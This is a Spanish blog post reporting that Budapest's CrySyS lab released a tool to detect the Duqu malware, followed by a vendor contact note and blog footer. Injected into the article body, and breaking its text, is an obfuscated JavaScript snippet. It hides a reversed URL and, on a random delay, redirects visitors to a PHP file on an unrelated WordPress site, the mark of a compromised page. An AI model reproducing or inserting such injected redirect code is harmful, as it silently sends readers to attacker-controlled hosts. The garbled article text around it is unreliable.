Publican herramienta para detectar infecciones del DUQU
Un laboratorio de criptografía y seguridad en sistemas de Budapest, reveló un método para hallar vestigios de Duqu, amenaza considerada como la sucesora de Stuxnet. U
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos/jpg/2011/11/600x0_481348.jpg” alt=”” width=”600″ height=”450″ /></p>
<p>El Labora<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
torio de Criptografía y Seguridad de Sistemas (CrySyS) de la Universidad Técnica de Budapest dio a conocer una to capaz de detectar versiones activas de Duqu.
Se piensa que Duqu, que se ocultó detrás de archivos de Word que llegaban vía mail, es creación de los mismos piratas detrás de Stuxnet, una peligrosa amenaza que puso en jaque a una instalación estratégica de Irán.
La herramienta de CrySys tiene por objetivo detectar distintos tipos de irregularidades e indicadores conocidos que sugieren la presenta de Duqu en el sistema que está siendo analizado.
Desde el mencionado laboratorio pidieron a las compañías que no eliminen el material infectado por Duqu y que lo compartan con empresas de seguridad informática.
CrySys dijo que el usuario promedio, en caso de encontrar una infección, debería conseguir ayuda profesional.
El VirusScan de McAfee detecta, controla y elimina dicho virus, pero no está de mas conocer la disponibilidad de una utilidad de codigo abierto para el caso.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.